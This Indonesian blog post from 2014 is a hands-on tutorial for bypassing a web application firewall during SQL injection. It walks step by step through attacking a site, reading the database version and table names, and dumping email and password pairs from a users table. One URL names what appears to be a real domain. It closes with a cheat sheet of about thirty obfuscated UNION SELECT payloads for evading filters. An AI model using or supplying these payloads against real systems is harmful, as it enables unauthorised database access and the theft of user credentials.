Subscribe:

Ads 468x60px

Kamis, 30 Januari 2014

Bypass WAF filter in SQLI


assalamualaikum
kali ini tentang bagaimana membypass filter waf pada bug sqli

secara manual, kenapa manual soal nya sqlmap nya lg bobo :P
okay langsung aja
target:
http://www.target.com/ebookcontents.php?id=95'













yaps bug sqli
kemudian lanjut dah pake perintah "order by" , cari kolom nya
http://www.target.com/ebookcontents.php?id=95 order by 7--
Unknown column '7' in 'order clause'











lanjut sampe dapat :D
ternyata ada 6 kolom
http://www.target.com/ebookcontents.php?id=95 order by 6--


terus cari angka ajaib nya dengan perintah "union select"
http://www.target.com/ebookcontents.php?id=95 union select 1,2,3,4,5,6--
dan hasil nya Not Acceptable kemungkinan ada waf, mari kita coba bypass
kita ganti kata "union select" dengan
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,3,4,5,6--













ew bisa di buka ternyata, disini saya memilih angka 3 :D
coba kita liat versi mysql berapa dia
http://www.target.com/ebookcontents.php?id=-95 /*!union*/ /*!select*/ 1,2,version(),4,5,6--
dia pake versi 5.5.34-cll













lanjut dah kita liat isi database nya dengan perintah
http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,group_concat(table_name)(0x3c62723e,table_name)*/,4,5,6 from information_schema.tables where table_schema=database()--
dan hasil nya  Not Acceptable, mungkin harus alay kali yah syntax nya, kita coba dengan cara ini

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(0x3c62723e,table_name)*/,4,5,6 +from+/*!information_schema*/.tables+where+/*!table_schema*/=database()--+
dan hasil nya












heheh bisa dah, ada banyak isi "database" nya, mari kita fokus pada database "users"
masukkan perintah ini

http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/1,2,concat/*!50000(Group_Concat(table_name))*/,4,5,6 from information_schema.tables where table_schema=database()--

hemm banyak table nya uyy,
disini saya memilih table "users"













http://www.target.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!column_name*/)),4,5,6 from /*!information_schema*/.columns where /*!table_name*/=0x7573657273--+

dan hasil nya ada id,email,password,date












mari kita dump :P

http://www.trnres.com/ebookcontents.php?id=-95/*!union*//*!select*/ 1,2,concat/*!50000(group_concat(/*!email,0x3a,password*/)),4,5,6/*!from*/ /*!users*/

dan hasil nya












bonus dah













tips dan trik
1. id=1+(UnIoN)+(SelECT)+
2. id=1+(UnIoN+SeLeCT)+
3. id=1+(UnI)(oN)+(SeL)(EcT)
4. id=1+'UnI''On'+'SeL''ECT'
5. id=1+%55nion all /*!12345%53elect*/ 1,version(),3—
6. id=1+UnIoN+SeLecT 1,2,3—
7. id=1+UnIOn/**/SeLect 1,2,3—
8. id=1+UNIunionON+SELselectECT 1,2,3—
9. id=1+/*!UnIOn*/+/*!sElEcT*/ 1,2,3—
10. id=1 and (select 1)=(Select 0xAA 1000 more A’s)+UnIoN+SeLeCT 1,2,3—
11. id=1+%23sexsexsex%0aUnIOn%23sexsexsex%0aSeLecT+1,2 ,3—
12. id=1+un/**/ion+sel/**/ect+1,2,3--
13. id=1+/**//*U*//*n*//*I*//*o*//*N*//*S*//*e*//*L*//*e*//*c*//*T*/1,2,3
14. id=1+/**/union/*&id=*/select/*&id=*/column/*&id=*/from/*&id=*/table--
15. id=1+/**/union/*&id=*/select/*&id=*/1,2,3--

And


UNION SELECT Bypassing ::

union(select(0),version(),(0),(0),(0),(0),( 0),(0),(0))
/*!50000union*/+/*!50000select*/
UNIunionON+SELselectECT
+union+distinct+select+
+union+distinctROW+select+
union+/*!select*/+1,2,3
union/**/select/**/1,2,3
uni%20union%20/*!select*/%20
/**//*!union*//**//*!select*//**/
union%23aa%0Aselect
/**/union/*!50000select*/
/*!20000%0d%0aunion*/+/*!20000%0d%0aSelEct*/
%252f%252a*/UNION%252f%252a /SELECT%252f%252a*/
+%23sexsexsex%0AUnIOn%23sexsexs ex%0ASeLecT+
id=1+’UnI”On’+'SeL”ECT’ <-MySQL only
id=1+'UnI'||'on'+SeLeCT' <-MSSQL only


after id no. like id=1 +/*!and*/+1=0

+div+0
Having+1=0
+AND+1=0
+/*!and*/+1=0
and(1)=(0)

ok semoga bermanfaat

0 komentar:

Posting Komentar